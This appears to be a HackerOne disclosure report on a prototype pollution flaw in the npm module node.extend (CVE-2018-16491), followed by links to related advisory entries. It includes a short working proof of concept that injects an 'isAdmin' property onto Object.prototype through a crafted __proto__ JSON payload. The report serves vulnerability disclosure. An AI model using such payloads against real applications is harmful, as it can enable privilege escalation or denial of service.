Lucene search
AsgerfH1:430831HistoryOct 30, 2018 - 11:42 a.m.
Node.js third-party modules: Prototype pollution attack in node.extend
2018-10-3011:42:18
asgerf
hackerone.com
68
0.004 Low
EPSS
Percentile
73.4%
I would like to report a prototype pollution vulnerability in node.extend.
It allows an attacker to inject properties on Object.prototype.
Module
module name: node.extendversion:2.0.0npm page: https://www.npmjs.com/package/node.extend
Module Description
A port of jQuery.extend that actually works on node.js
Module Stats
267,701 downloads in the last week
Vulnerability
Vulnerability Description
This is a variant of this vulnerability:
https://hackerone.com/reports/310443
node.extend can be tricked into adding or modifying properties of the Object prototype. These properties will be present on all objects.
Steps To Reproduce:
Craft an object of form {__proto__: {...}} and send it to node.extend:
let extend = require('node.extend');
extend(true, {}, JSON.parse('{"__proto__": {"isAdmin": true}}'));
console.log({}.isAdmin); // true
Wrap up
- I contacted the maintainer to let them know: [N]
- I opened an issue in the related repository: [N]
Impact
Denial of service, possibly more depending on the application.
See https://hackerone.com/reports/310443
Related
ubuntucve
ubuntucve
CVE-2018-16491
2019-02-01 00:00:00
veracode
veracode
Prototype Pollution
2019-02-04 01:17:46
cve
cve
CVE-2018-16491
2019-02-01 18:29:01
redhatcve
redhatcve
CVE-2018-16491
2019-10-12 01:35:29
osv
osv
Prototype Pollution in node.extend
2019-02-07 18:17:34
nvd
nvd
CVE-2018-16491
2019-02-01 18:29:01
cvelist
cvelist
CVE-2018-16491
2019-02-01 18:00:00
debiancve
debiancve
CVE-2018-16491
2019-02-01 18:29:01
prion
prion
Buffer overflow
2019-02-01 18:29:00
nodejs
nodejs
Prototype Pollution
2019-02-06 01:11:08
github
github
Prototype Pollution in node.extend
2019-02-07 18:17:34
